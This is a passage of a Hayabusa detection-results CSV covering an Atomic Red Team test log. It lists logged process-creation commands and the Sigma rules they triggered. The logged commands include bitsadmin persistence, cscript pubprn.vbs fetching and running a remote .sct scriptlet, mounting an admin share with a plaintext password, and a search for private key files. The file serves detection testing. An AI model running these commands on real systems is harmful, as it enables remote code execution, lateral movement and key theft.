C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.807 +09:00,MSEDGEWIN10,1,medium,Monitoring For Persistence Via BITS,,rules/sigma/process_creation/win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:30.917 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /complete AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.157 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /resume AtomicBITS : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /resume AtomicBITS""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:31.240 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.834 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b 
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:36.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "" script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:37.264 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
+2019-07-19 23:48:41.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c "" net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:48:57.524 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c:\ /b /s .key "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .key : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,Discover Private 
Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : 
Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Query 
Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad : Path: 
C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent 
Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Query 
